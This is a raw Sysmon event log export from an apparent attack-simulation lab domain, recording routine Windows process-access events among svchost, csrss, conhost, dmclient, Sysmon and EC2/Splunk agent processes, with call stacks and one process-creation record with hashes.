10341000x8000000000000000359931Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:02.945{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359932Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:13.009{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359944Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.971{8e433fbf-36c5-6013-9103-000000001100}71207172C:\Windows\system32\conhost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359943Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.971{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-36c5-6013-9103-000000001100}7120C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\SYSTEM32\CSRSRV.dll+1430|C:\Windows\SYSTEM32\CSRSRV.dll+5fd9|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000359942Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359941Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359940Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359939Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359938Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-0600-000000001100}7565040C:\Windows\system32\csrss.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000359937Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a45-6013-1e00-000000001100}16409708C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|c:\windows\system32\UBPM.dll+af5a|c:\windows\system32\UBPM.dll+9f29|c:\windows\system32\UBPM.dll+7b81|c:\windows\system32\UBPM.dll+95d1|c:\windows\system32\UBPM.dll+9324|c:\windows\system32\UBPM.dll+869a|c:\windows\system32\UBPM.dll+61dc|c:\windows\system32\EventAggregation.dll+2fbc|c:\windows\system32\EventAggregation.dll+312d|c:\windows\system32\EventAggregation.dll+2870|c:\windows\system32\EventAggregation.dll+2600|c:\windows\system32\EventAggregation.dll+b118|C:\Windows\SYSTEM32\ntdll.dll+6ba5|C:\Windows\SYSTEM32\ntdll.dll+67f1|C:\Windows\SYSTEM32\ntdll.dll+6650|C:\Windows\SYSTEM32\ntdll.dll+305ac|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
154100x8000000000000000359936Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.956{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\System32\dmclient.exe10.0.18362.1 (WinBuild.160101.0800)Microsoft Feedback SIUF Deployment Manager ClientMicrosoft® Windows® Operating SystemMicrosoft Corporationdmclient.exeC:\Windows\system32\dmclient.exe utcwnfC:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=F75A111BDD09F49FD954AD0C148A123B,SHA256=D9F4EC9052D0C8B799660E7D74B41BA18366016AC361F7A85FE0FBB03637CB47,IMPHASH=8C17DBD4EE43E74FB5E09C8EC8F5271F{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
10341000x8000000000000000359935Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.955{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359934Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.940{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+ec7a|c:\windows\system32\lsm.dll+13166|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359933Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:21.940{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f537|c:\windows\system32\lsm.dll+13087|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359953Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.549{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359952Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.549{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359951Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.158{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359950Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.158{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359949Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.112{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+21a191|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000359948Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.096{8e433fbf-2a44-6013-1100-000000001100}111610484C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359947Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.096{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359946Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.096{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359945Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:22.096{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-36c5-6013-9003-000000001100}6728C:\Windows\system32\dmclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f537|c:\windows\system32\lsm.dll+1273a|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359954Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:23.065{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x800000000000000032669Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36CA-6013-6503-00000000A401}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032668Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032667Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032666Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032665Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
